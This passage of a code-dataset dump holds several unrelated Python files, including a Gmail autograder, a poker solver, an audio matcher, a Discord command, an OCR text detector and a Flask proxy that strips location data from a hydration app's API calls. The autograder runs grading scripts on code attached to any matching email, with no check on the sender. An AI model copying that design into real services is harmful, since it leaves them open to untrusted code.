sub_type)\n msg.set_payload(fp.read())\n fp.close()\n filename = os.path.basename(file)\n msg.add_header('Content-Disposition', 'attachment', filename=filename)\n message.attach(msg)\n\n raw_message = base64.urlsafe_b64encode(message.as_string().encode(\"utf-8\"))\n return {'raw': raw_message.decode(\"utf-8\")}\n\n\ndef create_draft(service, user_id, message_body):\n \"\"\"Create and insert a draft email. Print the returned draft's message and id.\n\n Args:\n service: Authorized Gmail API service instance.\n user_id: User's email address. The special value \"me\"\n can be used to indicate the authenticated user.\n message_body: The body of the email message, including headers.\n\n Returns:\n Draft object, including draft id and message meta data.\n \"\"\"\n try:\n message = {'message': message_body}\n draft = service.users().drafts().create(userId=user_id, body=message).execute()\n print(\"Draft id: %s\\nDraft message: %s\" % (draft['id'], draft['message']))\n return draft\n except Exception as e:\n print('An error occurred: %s' % e)\n return None\n\n\ndef send_msg(service, user_id, message):\n \"\"\"Send an email message.\n\n Args:\n service: Authorized Gmail API service instance.\n user_id: User's email address. The special value \"me\"\n can be used to indicate the authenticated user.\n message: Message to be sent.\n\n Returns:\n Sent Message.\n \"\"\"\n try:\n msg = service.users().messages().send(userId=user_id, body=message).execute()\n print('Message Id: %s' % msg['id'])\n return msg\n except Exception as e:\n print('An error occurred: %s' % e)\n return None\n\n\ndef remove_label_from_msg(service, msg_id, label):\n try:\n service.users().messages().modify(userId='me', id=msg_id, body={'removeLabelIds': [label]}).execute()\n except Exception as e:\n print('An error occurred: %s' % e)\n\n\ndef main():\n \"\"\"\n Shows basic usage of the Gmail API.\n \"\"\"\n\n creds = None\n # The file token.pickle stores the user's access and refresh tokens, and is\n # created automatically when the authorization flow completes for the first\n # time.\n if os.path.exists('token.pickle'):\n with open('token.pickle', 'rb') as token:\n creds = pickle.load(token)\n # If there are no (valid) credentials available, let the user log in.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(\n 'credentials.json', SCOPES)\n creds = flow.run_local_server(port=0)\n # Save the credentials for the next run\n with open('token.pickle', 'wb') as token:\n pickle.dump(creds, token)\n\n service = build('gmail', 'v1', credentials=creds)\n profile = service.users().getProfile(userId='me').execute()\n from_email = profile.get('emailAddress')\n subject = 'TDT4102 feedback'\n filename = 'feedback.txt'\n\n while True:\n try:\n now = datetime.now()\n current_time = now.strftime(\"%H:%M:%S\")\n print(current_time, \"--> Check for new emails\")\n msg_id_list = find_msg_ids(service, 'TDT4102')\n for msg_id in msg_id_list:\n subprocess.call([\"rm -f handin.zip\"], shell=True)\n load_attachments(service, 'me', msg_id, './')\n run_shell_script(\"test_code.sh\")\n to_email = find_sender_email(service, msg_id)\n text = get_feedback(filename)\n msg = create_msg_with_attachment(from_email, to_email, subject, text, filename)\n send_msg(service, 'me', msg)\n print(\"Email sent to \" + to_email + \" from \" + from_email)\n remove_label_from_msg(service, msg_id, 'UNREAD')\n time.sleep(5)\n except Exception as error:\n 
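# log the failure and keep going; the surrounding while-True loop retries on the next iteration\n 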
print('An error occurred: %s' % error)\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"martinty/gmail-api","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"32342615689","text":"import time\nstart = time.time()\n#---------------------------\ndef Values(array):\n return [i[1] for i in array]\ndef Straight(array1):\n if array1[0]+1 == array1[1] and array1[1] + 1 == array1[2] and array1[2] +1 == array1[3] and array1[3] + 1 == array1[4]:\n return True\n return False\n\ndef RStraight(array):\n array.sort()\n isStraight = Straight(array)\n if isStraight and max(array) == 14:\n return True,True\n return (False,isStraight)\n\ndef Flush(array):\n if array[0][0] == array[1][0] and array[2][0] == array[1][0] and array[2][0] == array[3][0] and array[3][0] == array[4][0]:\n return True\n return False\n\ndef Royal(arrayv,arrays):\n flush = Flush(arrays)\n straight = RStraight(arrayv)\n if straight[0] and flush:\n return [True]*3\n return False,straight[1],flush\n\ndef cardsWithSameValues(array):\n values = {}\n Foak,Toak,FH,TP = [False]*4\n OP = [False,0]\n for i in array:\n values[i] = 0\n for i in array:\n values[i] += 1\n keys = list(values.keys())\n if len(values) == 2:\n \n if values[keys[0]] == 4 or values[keys[1]] == 4:\n print('k0 ',keys[0],'k1 ',keys[1])\n Foak = True\n else:\n FH = True\n elif len(values) == 3:\n if values[keys[0]] == 3 or values[keys[1]] == 3 or values[keys[2]] == 3:\n Toak = True\n else:\n TP = True\n elif len(values) == 4:\n i = 0\n while values[keys[i]] < max(values.values()):\n i+=1\n OP = True,keys[i]\n return (Foak,FH,Toak,TP,OP)\n\n\npoker_hands = open('/home/adam/Documents/programming/python3/p054_poker.txt','r').read().split('\\n')\ncards = [i.split(' ') for i in poker_hands[:-1]]\nfor i in range(len(cards)):\n for j in range(len(cards[i])):\n a = cards[i][j][0]\n cards[i][j] = [cards[i][j][1]]\n \n if a <= '9':\n cards[i][j].append(int(a))\n elif a == 'T':\n cards[i][j].append(10)\n elif a == 'J':\n cards[i][j].append(11)\n elif a == 'Q':\n cards[i][j].append(12)\n elif a == 'K':\n cards[i][j].append(13)\n else:\n cards[i][j].append(14)\n cards[i] = [cards[i][0:5],cards[i][5:]]\n\nwins = 0\nprint(cards[0])\nfor e,hands in enumerate(cards):\n winner = 0\n hands_values = Values(hands[0]),Values(hands[1])\n straight = [False, False]\n flush = [False, False]\n royal = [False, False]\n hv = [False,False]\n Foak = [False, False]\n Toak = [False, False]\n FH = [False, False]\n TP = [False, False]\n OP = [[False,0],[False,0]]\n for j in range(1):\n royal[0],straight[0],flush[0] = Royal(hands_values[0],hands[0])\n royal[1],straight[1],flush[1] = Royal(hands_values[1],hands[1])\n if royal[0] + royal[1]:\n #print(\"royal \",end=' ')\n hv[0] = royal[0]\n hv[1] = royal[1]\n break\n if (straight[0] and flush[0]) or (straight[1] and flush[1]):\n #print(\"straight flush \",straight,flush,end=' ')\n hv[0] = straight[0]\n hv[1] = straight[1]\n break\n a = cardsWithSameValues(hands_values[0])\n b = cardsWithSameValues(hands_values[1])\n \n #Foak[0],FH[0],Toak[0],TP[0],OP[0] = cardsWithSameValues(hands_values[0])#[::-1]\n #Foak[1],FH[1],Toak[1],TP[1],OP[1] = cardsWithSameValues(hands_values[1])\n Foak[0] = a[0]\n FH[0] = a[1]\n Toak[0] = a[2]\n TP[0] = a[3]\n OP[0] = a[4]\n Foak[1] = b[0]\n FH[1] = b[1]\n Toak[1] = b[2]\n TP[1] = b[3]\n OP[1] = b[4]\n #print(OP)\n if Foak[0] + Foak[1]:\n #print(\"Foak \",Foak,end=' ')\n hv[0] = 
Foak[0]\n hv[1] = Foak[1]\n break\n if FH[0] + FH[1]:\n #print(\"Full House \",end=' ')\n hv[0] = FH[0]\n hv[1] = FH[1]\n break\n if flush[0] + flush[1]:\n #print(\"Flush \",end=' ')\n hv[0] = flush[0]\n hv[1] = flush[1]\n break\n if straight[0] + straight[1]:\n #print(\"straight \",straight,end=' ')\n hv[0] = straight[0]\n hv[1] = straight[1]\n break\n if Toak[0] + Toak[1]:\n #print(\"toak \",end=' ')\n hv[0] = Toak[0]\n hv[1] = Toak[1]\n break\n if TP[0] + TP[1]:\n #print(\"tp \",end=' ')\n hv[0] = TP[0]\n hv[1] = TP[1]\n break\n if OP[0][0] + OP[1][0]:\n #print(\"op \",end=' ')\n if OP[0][0] and OP[1][0]:\n hv[0] = OP[0][1] > OP[1][1]\n hv[1] = not hv[0]\n else:\n hv[0] = OP[0][0]\n hv[1] = OP[1][0]\n break\n if hv[0] == hv[1]:\n m = [max(hands_values[0]), max(hands_values[1])]\n while m[0] == m[1]:\n hands_values[0].remove(m[0])\n hands_values[1].remove(m[1])\n m = [max(hands_values[0]), max(hands_values[1])]\n winner = 1 if m[0] > m[1] else 2\n else:\n winner = 1 if hv[0] > hv[1] else 2\n wins += winner%2\n #print(wins, e)\nprint(wins)\n#---------------------------\nprint(time.time()-start,\" ------seconds------\\n\")\n","repo_name":"Dzem-z/project-Euleler-solutions","sub_path":"python_solutions/euler54.py","file_name":"euler54.py","file_ext":"py","file_size_in_byte":5286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"3866254913","text":"import librosa as sa\nfrom dtw import dtw\nfrom numpy.linalg import norm\nimport os\n\ndef getFiles(path):\n objects = []\n for currentDir,subdirs,files in os.walk(path):\n for file in files:\n if file.endswith('.wav'):\n path = os.path.join(currentDir,file)\n objects.append(path) \n return objects\nfiles= getFiles(\"data/cmd\")\n\nin_file=files[3]\nresult_file=\"xxxxx\"\nresultdist=-100\nx,sr = sa.load(in_file)\nmfcc_1 = sa.feature.mfcc(x,sr)\nfor index in range(len(files)):\n if index == 3:\n continue\n else:\n tmp_file = files[index]\n tmp,sr_tmp = sa.load(tmp_file)\n mfcc_tmp = sa.feature.mfcc(tmp,sr_tmp)\n dist,cost,acc_cost,path = dtw(mfcc_1.T,mfcc_tmp.T,dist=lambda x,y: norm(x-y,ord=1))\n if resultdist == -100:\n resultdist = dist\n result_file = tmp_file\n else:\n if dist len(required):\n grade_request = ' '.join(args[1:]).strip()\n ronanda.db.update_character(name=message.author.nick, grade=grade_request)\n embed = discord.Embed(\n colour=discord.Colour.from_rgb(210, 190, 100),\n title=\":white_check_mark: Changement de grade effectué\",\n description=\"Changement du grade de {officier}\".format(officier=officer)\n )\n embed.add_field(name=\"Nouveau grade\",\n value=\"```{}```\".format(ronanda.get_grade(message.author.nick)),\n inline=False)\n embed.set_thumbnail(url=str(Seal.LSPD))\n await message.channel.send(embed=embed)\n else:\n embed = discord.Embed(\n colour=discord.Colour.from_rgb(210, 190, 100),\n title=\":information_source: Syntaxe\",\n description=\"Modifier son grade.\"\n )\n embed.set_thumbnail(url=str(Seal.LSPD))\n embed.add_field(name=\"Syntaxe\",\n value=\"```!grade ```\",\n inline=False)\n embed.add_field(name=\"Exemple\",\n value=\"```!grade Officier II```\",\n inline=False)\n embed.add_field(name=\"Votre grade actuel ({})\".format(message.author.nick),\n value=\"`{}`\".format(ronanda.get_grade(message.author.nick)),\n inline=False)\n await 
message.channel.send(embed=embed)\n","repo_name":"ronanda5/bot-ronanda","sub_path":"commands/command_grade.py","file_name":"command_grade.py","file_ext":"py","file_size_in_byte":1876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"}
{"seq_id":"14499125423","text":"# -*- coding: utf-8 -*-\n\nfrom unittest import TestCase\nfrom lampwick.encoding_options import EncodingOptions\n\n\nclass TestMovie(TestCase):\n\n def test_init(self):\n base_options = {\n 'video_codec': 'h264'\n }\n options = EncodingOptions(base_options)\n\n print(options)\n print(options.as_parameters())\n","repo_name":"sdispater/lampwick","sub_path":"tests/test_encoding_options.py","file_name":"test_encoding_options.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"}
{"seq_id":"18724507384","text":"import os\n\nPREFIX_OP = 'prefix_op.txt'\nPREFIX_OUT = 'prefix_out.txt'\nRACE_OP = 'race_op.txt'\nRACE_OUT = 'race_out.txt'\nIMG = 'pm.img'\nPREFIX_IMG = 'prefix.img'\n\nGDB_TEMPLATE = os.environ['DURINN_HOME'] + '/trace_checker/checker/gdb_script'\nGDB_SCRIPT = 'gdb_script'\nCRASH_IMG = 'crash.img'\nVAL_OP = 'val_op.txt'\nVAL_OUT = 'val_out.txt'\nORACLE_OUT = 'oracle.txt'\n","repo_name":"cosmoss-jigu/durinn","sub_path":"trace_checker/lib/filenames.py","file_name":"filenames.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"}
{"seq_id":"43461715108","text":"from imutils.object_detection import non_max_suppression\nimport numpy as np\nimport argparse\nimport time\nimport cv2\n\n# OCR tool for extracting text from images\nfrom PIL import Image\nimport pytesseract\n\n# construct the argument parser and parse the arguments\nap = argparse.ArgumentParser()\n\nap.add_argument(\"-i\", \"--image\", type=str, help=\"path to the receipt\")\nap.add_argument(\"-east\", \"--east\", type=str, help=\"path to input EAST text detector\")\nap.add_argument(\"-c\", \"--min-confidence\", type=float, default=0.5, help=\"minimum probability required to inspect a region\")\nap.add_argument(\"-w\", \"--width\", type=int, default=320, help=\"resized image width (should be multiple of 32)\")\nap.add_argument(\"-e\", \"--height\", type=int, default=320, help=\"resized image height (should be multiple of 32)\")\n\nargs = vars(ap.parse_args())\n\n# load the receipt and grab the image dimensions\nimage = cv2.imread(args[\"image\"])\norig = image.copy()\n(H, W) = image.shape[:2]\n\n# set the new width and height and then determine \n# the ratio of change for both the width and height\n(newW, newH) = (args[\"width\"], args[\"height\"])\nrW = W / float(newW)\nrH = H / float(newH)\n\n# resize the image and grab the new image dimensions\nimage = cv2.resize(image, (newW, newH))\n(H, W) = image.shape[:2]\n\nlayerNames = [\n # This is the first layer of the network.\n # This layer is responsible for giving the probability of a region containing text or not.\n \"feature_fusion/Conv_7/Sigmoid\",\n # This layer is responsible for giving the bounding box coordinates of the text in the image.\n # Later I'd like to see if we can find a layer for determining the angle of the text.\n \"feature_fusion/concat_3\"\n]\n\n# load the pre-trained EAST text detector\nprint(\"[INFO] loading EAST text detector...\")\nnet = cv2.dnn.readNet(args[\"east\"])\n\n# construct a blob from the image and then perform \n# a forward pass of the model to obtain the two 
output layer sets\n# `blobFromImage` essentially converts the image into a blob of data.\n# The way it does this is by getting the mean of the RGB\n# values of the image and subtraction the mean from each RGB value\n# relative to the image. This is done to normalize the image.\n# Read more here: https://pyimagesearch.com/2017/11/06/deep-learning-opencvs-blobfromimage-works/\nblob = cv2.dnn.blobFromImage(image, 1.0, (W, H), (123.68, 116.78, 103.94), swapRB=True, crop=False)\n# start a time to determine how long it takes to run the model\nstart = time.time()\n# Set the blob as the input to the network\nnet.setInput(blob)\n# Deconstruct `scores` and `geometry` from the output of the network via `forward`\n#look more into the forward function\n(scores, geometry) = net.forward(layerNames)\n# End the timer\nend = time.time()\n\n# show timing information on text prediction\nprint(\"[INFO] text detection took {:.6f} seconds\".format(end - start))\n\n# grab the number of rows and columns from the scores volume\n# then initialize our set of bounding box rectangles and corresponding confidence scores\n(numRows, numCols) = scores.shape[2:4]\nrects = []\nconfidences = []\n\n# loop over the number of rows\nfor y in range(0, numRows):\n # extract the scores (probabilities), \n # followed by the geometrical data used to derive \n # potential bounding box coordinates that surround text\n scoresData = scores[0, 0, y]\n xData0 = geometry[0, 0, y]\n xData1 = geometry[0, 1, y]\n xData2 = geometry[0, 2, y]\n xData3 = geometry[0, 3, y]\n anglesData = geometry[0, 4, y]\n \n # loop over the number of columns\n for x in range(0, numCols):\n # if our score does not have sufficient probability, ignore it\n if scoresData[x] < args[\"min_confidence\"]:\n continue\n \n # compute the offset factor as our resulting feature maps will be 4x smaller than the input image\n (offsetX, offsetY) = (x * 4.0, y * 4.0)\n \n # extract the rotation angle for the prediction and then compute the sin and cosine\n angle = anglesData[x]\n cos = np.cos(angle)\n sin = np.sin(angle)\n \n # use the geometry volume to derive the width and height of the bounding box\n h = xData0[x] + xData2[x]\n w = xData1[x] + xData3[x]\n \n # compute both the starting and ending (x, y)-coordinates for the text prediction bounding box\n endX = int(offsetX + (cos * xData1[x]) + (sin * xData2[x]))\n endY = int(offsetY - (sin * xData1[x]) + (cos * xData2[x]))\n startX = int(endX - w)\n startY = int(endY - h)\n \n # add the bounding box coordinates and probability score to our respective lists\n rects.append((startX, startY, endX, endY))\n confidences.append(scoresData[x])\n \n# Finally we need to apply a `non-maxima suppression` to the bounding boxes\n# This will help us to remove overlapping bounding boxes\n# Read more here: https://pyimagesearch.com/2014/11/17/non-maximum-suppression-object-detection-python/\nboxes = non_max_suppression(np.array(rects), probs=confidences)\n\n\n# loop over the bounding boxes\nfor (startX, startY, endX, endY) in boxes:\n # scale the bounding box coordinates based on the respective ratios\n startX = int(startX * rW)\n startY = int(startY * rH)\n endX = int(endX * rW)\n endY = int(endY * rH)\n \n # HERE IS WHERE WE NEED TO DETERMINE HOW TO EXTRACT THE ACTUAL CONTENTS OF THE TEXT\n # I think we can use the bounding box coordinates to crop the image and then use OCR to extract the text\n \n # draw the bounding box on the image\n cv2.rectangle(orig, (startX, startY), (endX, endY), (0, 255, 0), 2)\n # crop the image based on startX, 
startY, endX, endY and then use OCR to extract the text\n cv2.imshow(\"cropped\", orig[startY:endY, startX:endX])\n \n \n'''\n THINGS TO DO:\n HELPFUL GUIDES:\n OpenCV: https://pyimagesearch.com/2018/08/20/opencv-text-detection-east-text-detector/\n PyTesseract: https://www.pyimagesearch.com/2017/07/10/using-tesseract-ocr-python/\n \n 1. Use the coordinates of the bounding box to crop the image and then use OCR to extract the text\n 2. Store the coordinates of the bounding box and the text in a tuple\n 3. Store the tuple in a list\n 4. Eventually we will need to store the data in a json file.\n 5. Far down the line we'll use the coordinates of each text and the contents of the text to determine what part of the receipt is what.\n 6. Then, we'll have a JSON file that contains each part of the receipt.\n'''","repo_name":"bbluecircles/Receipt-Reader","sub_path":"text_detection.py","file_name":"text_detection.py","file_ext":"py","file_size_in_byte":6473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"3236092733","text":"# -*- coding: utf-8 -*-\n\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('backbone', '0842_sensorthreshold_create_user'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='sensorthresholdaction',\n name='create_user',\n field=models.ForeignKey(related_name='sensor_threshold_action_create_user', blank=True, to=settings.AUTH_USER_MODEL, null=True),\n preserve_default=True,\n ),\n ]\n","repo_name":"walong365/icsw","sub_path":"initat/cluster/backbone/migrations/0843_sensorthresholdaction_create_user.py","file_name":"0843_sensorthresholdaction_create_user.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"35857254763","text":"import time\nimport gc\nimport os\nimport struct\nimport board\nimport gifio\nimport digitalio\n\n# Get a dictionary of GIF filenames at the passed base directory\ndef get_files(base):\n allfiles = os.listdir(base)\n file_names = []\n for _, filetext in enumerate(allfiles):\n if not filetext.startswith(\".\"):\n if filetext not in ('boot_out.txt', 'System Volume Information'):\n if filetext.endswith(\".gif\"):\n file_names.append(filetext)\n return file_names\n\n# Set BOOT button on ESP32-S2 Feather TFT to advance to next GIF\nbutton = digitalio.DigitalInOut(board.BUTTON)\nbutton.switch_to_input(pull=digitalio.Pull.UP)\n\ndisplay = board.DISPLAY\ndisplay.auto_refresh = False\n\nCOL_OFFSET = 40 # The Feather TFT needs to have the display\nROW_OFFSET = 53 # offset by these values for direct writes\n\nfiles = get_files(\"/\")\nfor i in range(len(files)):\n\n odg = gifio.OnDiskGif(files[i])\n # Skip PyPortal GIFs if put on ESP32-S2 Feather TFT\n if odg.width != board.DISPLAY.width:\n print(\"File \"+files[i]+\" not right width, skipping\\n\")\n continue\n\n start = time.monotonic()\n next_delay = odg.next_frame() # Load the first frame\n end = time.monotonic()\n call_delay = end - start\n\n # Display GIF file frames until screen touched (for PyPortal)\n while True:\n sleeptime = max(0, next_delay - call_delay)\n time.sleep(sleeptime)\n # If the BOOT button is pressed, advance to next GIF file\n if button.value is False:\n print(\"Button Press, Advance\\n\")\n break\n next_delay = odg.next_frame()\n display.bus.send(42, struct.pack(\">hh\", COL_OFFSET,\n odg.bitmap.width - 1 + COL_OFFSET))\n 
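# DCS command 42 (0x2A, CASET) above set the column window; 43 (0x2B, RASET) sets the rows and 44 (0x2C, RAMWR) streams the bitmap\n 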
display.bus.send(43, struct.pack(\">hh\", ROW_OFFSET,\n odg.bitmap.height - 1 + ROW_OFFSET))\n display.bus.send(44, odg.bitmap)\n # End while\n # Clean up memory\n odg.deinit()\n odg = None\n gc.collect()\n# End for\n","repo_name":"adafruit/Adafruit_Learning_System_Guides","sub_path":"CircuitPython_gifio/Feather/code-multi-feather-direct.py","file_name":"code-multi-feather-direct.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","stars":913,"dataset":"github-code","pt":"5"}
{"seq_id":"26373551978","text":"#import os\r\n\r\n#print(os.getcwd())\r\n\r\nimport Phones\r\nimport Phones.Sounds\r\n#import Phones.G3 #Only import G3 file from Phones package\r\n#from Phones import G3 #Same as above statement\r\n\r\nPhones.Pots()\r\nPhones.G3_phone()\r\nPhones.Isdn()\r\nPhones.Sounds.Big_Bang()\r\n#G3.G3_phone() #File functions called this way using the from import line\r\n\r\n\r\n#with open('Text.txt') as f:\r\n #for line in f:\r\n #print(line)\r\n\r\n#f = open('Text.txt', 'r+')\r\n#read_line = f.readline()\r\n#print(read_line)\r\n#value = ('Sonic speed', 42069)\r\n#s = str(value)\r\n#f = open('Text.txt', 'w')\r\n#f.seek(5)\r\n#print(f.write(s))\r\n#print(f.read())\r\n#f.close()\r\n\r\nimport json\r\nprint(json.dumps([1, 'simple', 'list']))\r\nf = open('Tism.txt', 'r+')\r\nx = (2, 'simple', 'list')\r\nserialized = json.dumps(x) #json.dumps serializes, so name the result accordingly\r\nq = json.loads(serialized)\r\nprint(q)\r\n#data = json.dump(x, f)\r\nd_data = json.load(f)\r\nprint(d_data)\r\nf.close()\r\n","repo_name":"AlexanderGruhl/Python3-ROSPY","sub_path":"Practice Programs/Phone/execution.py","file_name":"execution.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"}
{"seq_id":"69803307031","text":"# Binary Search Algorithm (B.S.A.)\n\ndef binary_search(list, item):\n low = 0 # <== start of the array\n high = len(list) - 1 # <== end of the array\n\n while low <= high:\n mid = (low + high) // 2\n guess = list[mid]\n if guess == item: # <== the target equals the middle element\n return mid\n if guess > item: # <== the target is less than the middle element\n high = mid - 1\n else: # <== the target is greater than the middle element\n low = mid + 1\n return None\n\n# Quick Sort Algorithm (Q.S.A.)\n\ndef quicksort(array):\n if len(array) < 2:\n return array\n else:\n start_point = array[0] # <== the pivot is the first element\n less = [i for i in array[1:] if i <= start_point] # <== goes left if not greater than the pivot \n greater = [i for i in array[1:] if i > start_point] # <== goes right if greater than the pivot\n return quicksort(less) + [start_point] + quicksort(greater) # <== combine the sorted partitions around the pivot\n \n\n# Merge Sort Algorithm (M.S.A.)\n\ndef mergesort(array): \n if len(array) > 1: \n mid = len(array)//2\n left = array[:mid] \n right = array[mid:]\n mergesort(left) \n mergesort(right) \n\n i = j = k = 0\n\n while i < len(left) and j < len(right): \n if left[i] < right[j]: \n array[k] = left[i] \n i += 1\n else: \n array[k] = right[j] \n j += 1\n k += 1\n\n while i < len(left): \n array[k] = left[i] \n i += 1\n k += 1\n\n while j < len(right): \n array[k] = right[j] \n j += 1\n k += 1\n\n# Knuth-Morris-Pratt Algorithm (KMP Algorithm)\n\ndef KMPalgorithm(text, word):\n pi = [0]*len(word) # <-- maximum matching suffix/prefix LENGTH for position i of the pattern\n i = 1\n j = 0 \n while i < len(word):\n if word[j] == word[i]: # compare the pattern element at j with the one at i\n pi[i] = j+1 # if they match, store j+1 in the array and advance i and j\n i += 1\n j += 1\n else: # if they differ and j is 0, start counting from scratch\n if j == 0: \n pi[i] = 0\n i += 1\n else:\n j = pi[j-1] # otherwise fall back to the previous prefix length in the pattern\n\n print(f'Maximum suffix length - {max(pi)}')\n\n message = len(word)\n message_text = len(text)\n\n i = 0\n j = 0\n while i < message_text:\n if text[i] == word[j]:\n i += 1\n j += 1\n if j == message:\n print(f'Word/element ({word}) found')\n break\n else:\n if j > 0:\n j = pi[j-1]\n else:\n i += 1\n\n if i == message_text and j != message:\n print(f'Word/element ({word}) not found')\n\n\n\n\n\n\n","repo_name":"L0GIN0UT/Python_semiar_lectures","sub_path":"Algorithm_sort/Alg.py","file_name":"Alg.py","file_ext":"py","file_size_in_byte":3639,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"}
{"seq_id":"43822769788","text":"import json\nimport os\nimport time\nimport urllib.parse\n\nfrom flask import Flask, request\n\nimport requests\n\n\napp = Flask(__name__)\napp.config.from_object('config')\nos.makedirs(app.config['LOG_PATH'])\n\n\n@app.route('/', methods=app.config['HTTP_METHODS'])\ndef default():\n return 'success {}'.format(request.method)\n\n\ndef sanitize_headers(all_headers):\n headers = {}\n for key in (\n 'X-Parse-Application-Id',\n 'X-Parse-Rest-Api-Key',\n 'X-Parse-App-Build-Version',\n 'X-Parse-App-Display-Version',\n 'X-Parse-Os-Version',\n 'X-Parse-Installation-Id',\n 'X-Parse-Client-Key',\n 'X-Parse-Session-Token',\n 'Content-Length',\n 'Content-Type',\n 'User-Agent',\n ):\n if key in all_headers:\n headers[key] = all_headers[key]\n\n return headers\n\n\ndef sanitize_data(all_data):\n if isinstance(all_data, str):\n return all_data\n elif isinstance(all_data, bytes):\n return all_data.decode()\n elif not all_data:\n return ''\n else:\n return json.dumps(all_data)\n\n\ndef call_api(headers=None, data=None):\n t = int(time.time() * 1000)\n\n if headers is None:\n headers = request.headers\n\n if data is None:\n data = request.data\n\n method = request.method\n headers = sanitize_headers(headers)\n data = sanitize_data(data)\n\n complete_path = request.path\n if request.args:\n complete_path += '?' 
+ urllib.parse.urlencode(request.args)\n\n resp = getattr(requests, method.lower())(\n app.config['BASE_URL'] + complete_path,\n headers=headers,\n data=data,\n )\n\n if app.config['LOG_REQUESTS']:\n with open(os.path.join(app.config['LOG_PATH'], str(t)), 'w') as f:\n f.write(json.dumps({\n 'method': method,\n 'path': complete_path,\n 'headers': headers,\n 'data': json.loads(data) if data else '',\n 'content': json.loads(resp.text),\n 'code': resp.status_code,\n }, indent=4))\n\n return resp.text, resp.status_code\n\n\n@app.route('/parse/classes/Bottle/<id>', methods=app.config['HTTP_METHODS'])\ndef classes_Bottle(id):\n try:\n data = json.loads(request.data)\n except json.decoder.JSONDecodeError:\n data = {}\n\n if isinstance(data.get('location'), dict):\n data['location']['latitude'] = 0\n data['location']['longitude'] = 0\n\n return call_api(data=data)\n\n\n@app.route('/parse/classes/Day/<id>', methods=app.config['HTTP_METHODS'])\ndef classes_Day(id):\n try:\n data = json.loads(request.data)\n except json.decoder.JSONDecodeError:\n data = {}\n\n if isinstance(data, dict):\n data['altitude'] = 0\n data['isLocationUsed'] = False\n data['humidity'] = 0\n data['rank'] = 0\n if 'location' in data:\n del data['location']\n\n return call_api(data=data)\n\n\n@app.route('/parse/config', methods=app.config['HTTP_METHODS'])\ndef config():\n content, code = call_api()\n\n try:\n content = json.loads(content)\n except json.decoder.JSONDecodeError:\n pass\n else:\n if isinstance(content.get('params'), dict):\n content['params'].update(**{\n 'downloadAppUrl': False,\n 'androidPregnancySettings': False,\n 'trophyShareUrl': False,\n 'trophySign': False,\n 'hidePro': False,\n })\n content = json.dumps(content)\n\n return content, code\n\n\n@app.route('/parse/classes/_Installation', methods=app.config['HTTP_METHODS'])\ndef classes_Installation_Main():\n try:\n data = json.loads(request.data)\n except json.decoder.JSONDecodeError:\n data = {}\n\n if isinstance(data, dict):\n data['deviceType'] = 'a'\n data['appVersion'] = 'a'\n data['deviceToken'] = 'a'\n\n return call_api(data=data)\n\n\n@app.route('/parse/classes/_Installation/<id>', methods=app.config['HTTP_METHODS'])\ndef classes_Installation(id):\n try:\n data = json.loads(request.data)\n except json.decoder.JSONDecodeError:\n data = {}\n\n if isinstance(data, dict):\n data['deviceType'] = 'a'\n data['deviceName'] = 'a'\n data['deviceToken'] = 'a'\n\n return call_api(data=data)\n\n\n@app.route('/parse/classes/Location', methods=app.config['HTTP_METHODS'])\ndef classes_Location():\n try:\n data = json.loads(request.data)\n except json.decoder.JSONDecodeError:\n data = {}\n\n if isinstance(data, dict):\n data['altitude'] = 0\n if isinstance(data.get('point'), dict):\n # zero the GeoPoint coordinates themselves, matching classes_Bottle\n data['point']['latitude'] = 0\n data['point']['longitude'] = 0\n\n return call_api(data=data)\n\n\n@app.route('/parse/<path:path>', methods=app.config['HTTP_METHODS'])\ndef parse(path):\n BLOCKED = (\n 'functions/trophyanalytics',\n 'events/AppOpened',\n 'events/setManualGoal',\n 'events/viewPreviousDay',\n 'events/previousDay',\n 'events/logout',\n 'events/unpairBottle',\n 'events/addBottle',\n 'functions/getusergroups',\n 'functions/getmychallenges',\n 'functions/getmyawards',\n 'functions/getmyfriends',\n 'functions/getuserads',\n 'functions/getjoinablechallenges',\n 'functions/getclosedchallenges',\n 'functions/getchallengedetail',\n )\n\n if path in BLOCKED:\n return json.dumps({'result': []}), 202\n\n return 
call_api()\n","repo_name":"Ninjaclasher/hidrateapp-server","sub_path":"mitm/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5458,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"5"} +{"seq_id":"73243963351","text":"import unittest\nfrom datetime import datetime\n\nfrom turbotools.date import datetime_to_str\nfrom turbotools.date import datetime_transfer\n\n\nclass DateTest(unittest.TestCase):\n def setUp(self):\n self.now_time = datetime.now()\n self.range_count = 10\n\n def test_datetime_to_str(self):\n data = datetime_to_str({'now': self.now_time}, 'now')\n self.assertEqual(isinstance(data['now'], str), True)\n\n def test_datetime_transfer(self):\n data_list = [{'time': self.now_time, 'now': self.now_time} for _ in range(self.range_count)]\n data = datetime_transfer(data_list, ['time', 'now'])\n for now_time in data:\n self.assertEqual(isinstance(now_time['time'], str), True)\n self.assertEqual(isinstance(now_time['now'], str), 